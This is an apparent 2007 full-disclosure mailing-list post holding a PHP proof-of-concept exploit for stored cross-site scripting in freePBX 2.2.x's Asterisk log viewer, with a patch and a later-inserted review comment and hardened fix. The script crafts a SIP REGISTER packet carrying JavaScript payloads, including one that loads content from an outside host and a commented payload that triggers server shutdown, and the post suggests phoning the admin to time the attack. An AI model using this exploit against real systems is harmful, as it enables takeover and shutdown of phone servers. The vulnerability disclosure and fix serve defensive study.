Message-Id: <ECE533E0-BB6B-4346-8E9C-C54A664D56FA@phreaker.net>
Date: Thu, 19 Apr 2007 19:43:14 -0400
From: XenoMuta <xenomuta@...eaker.net>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS in freePBX 2.2.x portal's Asterisk Log tool

#!/usr/bin/php
<?php
/*

       \  |      |   |           |                   |  _)
      |\/ |  _ \ __| __ \  |   | |\ \  /  _` | __ \  __| | __ \   _` |
      |   |  __/ |   | | | |   | | `  <  (   | |   | |   | |   | (   |
     _|  _|\___|\__|_| |_|\__, |_| _/\_\\__,_|_|  _|\__|_|_|  _|\__,_|
                      ____/
     ___ \  ___|   /                     Methylxantina 256mg
        ) | __ \   _ \  __ `__ \   _` |  http://xenomuta.blogspot.com
       __/    ) | (   | |   |   | (   |	
     _____|____/ \___/ _|  _|  _|\__, |  freePBX 2.2.x full-log XSS PoC
                                 |___/   by XenoMuta <xenomuta@...eaker.net>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ISSUE:
SIP protocol fields such as From, To, Call-ID, User-Agent (and many others)
can carry HTML tags, which are shown unfiltered by the Asterisk Log File tool
located at http://<freepbx root>/admin/modules/logfiles/asterisk-full-log.php,
resulting in malicious HTML or JavaScript code injection.

IMPACT:
Server shutdown/restart, PBX control and possible remote code execution through
amportal options. Just about anything you can code in JavaScript.
* Note that the amportal admin will only see the last 2000 lines of the full log,
  for which an attacker might call the admin asking for support at the time of
  exploitation. This doesn't require authentication or valid credentials >:)

WARNING:
* Do this at your own risk. Intended for research and educational purposes ONLY.
* Neither the author nor Methylxantine 256mg is accountable for your actions.
* Running this will taint your log file. Make sure you clean it after a test.

FIX:
Here is a way to fix the problem.

[root@...erisk1 ~]# cd /var/www/html/admin/modules/logfiles
[root@...erisk1 logfiles]# cat<<EOF|patch
*** asterisk-full-log.php       2007-04-18 12:51:10.000000000 -0400
--- asterisk-full-log.php.fixed 2007-04-18 12:51:18.000000000 -0400
***************
*** 10,16 ****
   <hr>
   <br>
   <?
! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/$/ 
<br>/"');
   ?>

   </body>
--- 10,16 ----
   <hr>
   <br>
   <?
! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/</ 
\&lt;/;s/>/\&gt;/" | sed -e "s/$/<br>/"');
   ?>

   </body>
EOF
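Review bot: the sed substitutions on the replacement line, `s/</\&lt;/;s/>/\&gt;/`, carry no `g` flag, so only the first `<` and the first `>` on each log line are escaped and a second tag on the same line reaches the browser intact; use `s/</\&lt;/g;s/>/\&gt;/g`, and put `s/&/\&amp;/g` ahead of them so an ampersand already present in the log is not rendered as the start of an entity. Better still, drop the system() call and pass each line through htmlspecialchars() in PHP, which escapes every occurrence on the line and the quote characters as well.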

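A hardened form of the log viewer, added here as an example and not code from the original post or from freePBX: it reads the last 2000 lines of the full log in PHP instead of shelling out through system(), and escapes every occurrence of the HTML special characters with htmlspecialchars(), which also closes the gap the sed substitutions above leave open (without a g flag they rewrite only the first < and > on each line). The log path and line count are the ones the page uses; the constant and function names are mine.

```php
<?php
// Added example, not code from the original post or from freePBX:
// a replacement for the tail|sed shell-out in asterisk-full-log.php.
// Assumed: log path and line count as on the page; names below are mine.

define('ASTERISK_FULL_LOG', '/var/log/asterisk/full');
define('LOG_TAIL_LINES', 2000);

// Escape one raw log line for safe inclusion in an HTML body.
// htmlspecialchars() rewrites every occurrence on the line (the sed fix
// without the g flag only touched the first < and the first >), and it
// escapes &, " and ' too, so a line cannot break out of a tag or attribute.
// ISO-8859-1 is used because every byte is valid in it: a log line holding
// malformed UTF-8 is escaped rather than silently dropped, and bytes other
// than &<>"' pass through unchanged.
function escape_log_line($line)
{
    return htmlspecialchars(rtrim($line, "\r\n"), ENT_QUOTES, 'ISO-8859-1');
}

// Return the last $count lines of $path, already escaped.
// Reading the file in PHP means no shell is involved at all, so there is
// nothing for a crafted log line or path to inject into.
function tail_log_escaped($path, $count)
{
    $lines = @file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        return array();  // unreadable log: show nothing rather than an error page
    }
    return array_map('escape_log_line', array_slice($lines, -$count));
}

// Same output shape as the original page: one escaped line, then <br>.
foreach (tail_log_escaped(ASTERISK_FULL_LOG, LOG_TAIL_LINES) as $line) {
    echo $line, "<br>\n";
}
?>
```

file() loads the whole log into memory, so on a busy PBX with a large full log either rotate the log or read it from the end (for example with SplFileObject) before slicing.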

PAYOLA AND GREETS:
:)
gr33tz to:
- God, for being so faithful.
- Lili, for the late-night patience and for your love
- the Asterisk team and the freePBX team, for such an EXCELLENT product
- EMRA, for the fragrance
- Leo, I gave you light


*/

print "\x1bc\n\x1b[1m\x1b[30m\x1b[47m";
print "                                                                                \n";
print "                                                                                \r";
print "      \\  |      |   |           |                   |  _)            \n";
print "                                                                                \r";
print "     |\\/ |  _ \\ __| __ \\  |   | |\\ \\  /  _` | __ \\  __| | __ \\   _` |\n";
print "                                                                                \r";
print "     |   |  __/ |   | | | |   | | `  <  (   | |   | |   | |   | (   |\n";
print "                                                                                \r";
print "    _|  _|\\___|\\__|_| |_|\\__, |_| _/\\_\\\\__,_|_|  _|\\__|_|_|  _|\\__,_|\n";
print "                                                                                \r";
print "                         ____/                                       \n";
print "                                                                                \r";
print "    ___ \\  ___|   /                     Methylxantina 256mg\n";
print "                                                                                \r";
print "       ) | __ \\   _ \\  __ `__ \\   _` |  http://xenomuta.blogspot.com\n";
print "                                                                                \r";
print "      __/    ) | (   | |   |   | (   |  \n";
print "                                                                                \r";
print "    _____|____/ \\___/ _|  _|  _|\\__, |  freePBX 2.2.x full-log XSS PoC\n";
print "                                                                                \r";
print "                                |___/   by XenoMuta <xenomuta@...eaker.net>\n";
print "                                                                                \n\x1b[0m";


//COMMENT ME TO PROCEED
//die("\x1b[31mWe urge you to read the code first. Comment this line to proceed.\n\x1b[0m");


if($argc<2) die("\nUsage: $argv[0] <sip proxy> [custom payload]\n\n");
$sipp=$argv[1];


if($argc<3){
//SOME SAMPLE PAYLOADS FOR YOUR PLEASURE

//Execute external payload (this one only possible with Call-id payload)
$payload="<script>var body=document.getElementsByTagName('body');".
"var fly= new Image(), ofly=new Image(), ifly=new Image();".
"ifly.src='http://xenmut.100webspace.net/fly2.png';".
"ofly.src='http://xenmut.100webspace.net/fly1.png';".
"ofly.onload=eval('var mv=setInterval(\'move()\',10);');".
"fly.setAttribute('id','fly');fly.style.position='absolute;';".
"fly.style.left='300';fly.style.top='100';body[0].appendChild(fly);".
"var ang,s=2,xx,yy,cal,pi=3.1415926535,ala=true;".
"function calma() {s=2;clearInterval(cal);}".
"function move() {var x,y;x=(s*(Math.sin(ang)));y=(s*(Math.cos(ang)));".
"ala=!ala;if(ala) fly.src=ifly.src;else fly.src=ofly.src;".
"if(Math.round(100*Math.random())>96)ang+=ala?5:-5;".
"if((xx+x>1024)||(xx+x<0)||(yy+y>800)||(yy+y<0)){ang=Math.round(360*Math.random());}".
"else{xx+=x;yy+=y;}fly.style.left=xx+'px';fly.style.top=yy+'px';}".
"function main(){ang=Math.round(360*Math.random());xx=620;yy=400;".
"fly.onmouseover=function() {s=10;ang=Math.round(360*Math.random());".
"clearInterval(cal);cal=setInterval('calma()',500);}}main();</script>";

//Space Invader (this one only possible with Call-id payload)
//$payload="<img width=900 src=http://www.i-marco.nl/weblog/images/SpaceInvader.jpg>";

// Server shutdown Payload
/*
.oOOOo.     Oo    O       o oOoOOoOOo ooOoOOo  .oOOOo.  o.     O
.O     o    o  O   o       O     o        O    .O     o. Oo     o
o          O    o  O       o     o        o    O       o O O    O
o         oOooOoOo o       o     O        O    o       O O  o   o
o         o      O o       O     o        o    O       o O   o  O
O         O      o O       O     O        O    o       O o    O O
`o     .o o      O `o     Oo     O        O    `o     O' o     Oo
`OoooO'  O.     O  `OoooO'O     o'    ooOOoOo  `OoooO'  O     `o
*/
//$payload='<img src="../sysstatus/shutdown.php">';
} else {
$payload=$argv[2];
}

$ext=1234;
$agent="SJphone v1.0";
// UDP socket to the SIP proxy; fsockopen() returns false when it cannot be opened
$udp=fsockopen("udp://$sipp",5060);
if(!$udp) die("\nCould not open a UDP socket to $sipp:5060\n\n");
$seq=rand(10000,99900);
// A single REGISTER request; the payload travels in the From and To header
// fields, which Asterisk writes verbatim into /var/log/asterisk/full
$packet = "REGISTER sip:$sipp SIP/2.0\n".
"Via: SIP/2.0/UDP $sipp:5060;rport;branch=z9hG4bK12345\n".
"From: $payload\n".
"To: $payload\n".
"Contact: \"$ext\" <sip:$ext@...pp:5060>\n".
"Call-ID: 12345@...pp\n".
"CSeq: $seq REGISTER\n".
"Expires: 1800\n".
"Max-Forwards: 70\n".
"User-Agent: $agent\n".
"Content-Length: 0\n\n";
fputs($udp,$packet);
fclose($udp);
die("\nPAYLOAD SENT:\n$payload\n");

?>